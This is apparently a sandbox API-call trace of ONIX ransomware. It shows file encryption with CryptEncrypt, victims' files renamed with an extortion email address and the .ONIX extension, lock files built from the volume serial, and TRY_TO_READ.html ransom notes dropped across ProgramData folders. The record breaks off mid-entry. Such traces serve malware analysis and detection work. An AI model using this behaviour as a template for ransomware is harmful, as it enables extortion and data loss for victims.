[0122.423] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.424] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.425] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.426] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x21dc) returned 0x4deb68 [0122.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x21dc) returned 0x4e0d50 [0122.428] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.428] ReadFile (in: hFile=0x4d0, lpBuffer=0x4deb68, nNumberOfBytesToRead=0x21dc, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4deb68*, lpNumberOfBytesRead=0x367f44c*=0x21dc, lpOverlapped=0x0) returned 1 [0122.430] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x21dc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.430] CloseHandle (hObject=0x4d0) returned 1 [0122.430] GetProcessHeap () returned 0x410000 [0122.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.430] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.432] GetProcessHeap () returned 0x410000 [0122.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0122.432] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.433] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.433] CloseHandle (hObject=0x3cc) returned 1 [0122.433] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.433] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x332)) [0122.433] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.433] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.433] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.433] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Mozilla9c354ca09c354b444c.lock") returned 50 [0122.433] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\mozilla9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.434] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.434] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.434] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0122.434] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f0b0 [0122.434] FindNextFileW (in: hFindFile=0x48f0b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.435] FindNextFileW (in: hFindFile=0x48f0b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0122.435] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\mozilla\\logs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4 [0122.437] FindNextFileW (in: hFindFile=0x48f0b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.437] FindNextFileW (in: hFindFile=0x48f0b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.437] CloseHandle (hObject=0x3cc) returned 1 [0122.437] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.437] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x332)) [0122.437] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.438] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.438] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.438] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Oracle9c354ca09c354b444c.lock") returned 49 [0122.438] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\oracle9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.438] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.438] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454238 [0122.439] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f0f0 [0122.439] FindNextFileW (in: hFindFile=0x48f0f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.439] FindNextFileW (in: hFindFile=0x48f0f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.439] FindNextFileW (in: hFindFile=0x48f0f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.439] CloseHandle (hObject=0x3cc) returned 1 [0122.439] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.439] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x332)) [0122.439] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.440] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.440] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.440] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Package Cache9c354ca09c354b444c.lock") returned 56 [0122.440] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\package cache9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.440] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.440] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b740 [0122.441] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f130 [0122.441] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.441] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0122.441] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.443] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0122.443] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.445] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32944fb0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.445] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0122.445] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.446] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0122.446] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.451] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0122.451] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.453] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0122.453] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.456] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1 [0122.456] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.457] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1 [0122.457] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.459] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1 [0122.459] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.462] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, 